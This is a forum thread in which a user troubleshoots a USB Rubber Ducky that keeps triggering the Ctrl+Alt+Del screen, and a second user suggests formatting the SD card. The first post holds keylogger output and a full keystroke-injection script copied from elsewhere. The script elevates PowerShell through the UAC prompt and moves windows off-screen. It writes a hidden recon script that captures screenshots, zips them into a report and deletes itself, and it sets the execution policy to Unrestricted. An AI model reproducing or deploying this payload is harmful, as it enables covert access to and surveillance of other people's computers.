HelloPoppit Posted January 28, 2014 Share Posted January 28, 2014 (edited) So, today, with a new problem. EDIT: This is what KKP ( A keylogger ) logged when I hit the button to start the script ** [Ctrl][Alt][AltGr][up][End][Ctrl][Windows][Ctrl][AltGr][End][Alt][AltGr]#[Ctrl][AltGr][Alt][Ctrl][AltGr][Ctrl][AltGr][Ctrl][Windows][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows][AltGr][Alt][AltGr][PageUp][Windows]J[Ctrl][Windows][AltGr][Alt][AltGr][PageDown][Ctrl][Alt][Ctrl][AltGr] [NumLock][Ctrl][Alt][Windows][Alt][AltGr][Alt][Windows][AltGr][MenuClick][Ctrl][Windows][Ctrl][AltGr][PageUp][Alt][Ctrl][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][scrollLock][Ctrl][Alt][Windows][AltGr][Ctrl][Alt][AltGr][Ctrl][AltGr][Alt][Windows]>[Windows][Ctrl][AltGr][MenuClick][Ctrl][Alt][Windows][MenuClick][Ctrl][Alt][AltGr][Alt][Ctrl][AltGr][PageDown][Ctrl][AltGr][F12][Windows]J[Ctrl][Alt][AltGr][F11][Ctrl][AltGr][Delete][End][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][/scrollLock][Ctrl][Alt][AltGr][Cancel][Alt][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Alt][Windows][AltGr][Ctrl]>[Ctrl][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Ctrl][Ctrl][AltGr][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows] ** That's all that was logged. HELP! can I get a email address to hak5? Last time they just sent me here. Is there a way to contact Darren himself? It's sad when a company just sends you to a useless forum without even helping. Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys. **Example Script** DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory ENTER STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth ENTER STRING $displayWidth = $displayInfo.ScreenWidth ENTER STRING $displayHeight = $displayInfo.ScreenHeight ENTER STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing") ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $image = new-object System.Drawing.Bitmap 1366 ,768 ENTER STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight ENTER STRING $screen = [system.Drawing.Graphics]::FromImage($image) ENTER STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy)) ENTER STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg)); ENTER STRING $x++ } while ($x -ne 1); ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = '/public\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER **** I just don't know what to do anymore. Someone help. The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything. EDIT:: I've also tried the simple " Hello world " script, same result. ALSO:; The microSD card wont save any new data? Edited January 28, 2014 by HelloPoppit Quote Link to comment Share on other sites More sharing options...
Guest spazi Posted January 28, 2014 Share Posted January 28, 2014 You should read the forum rules about double posting. Personally I would first format the SD card, see if that fixes the problem. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.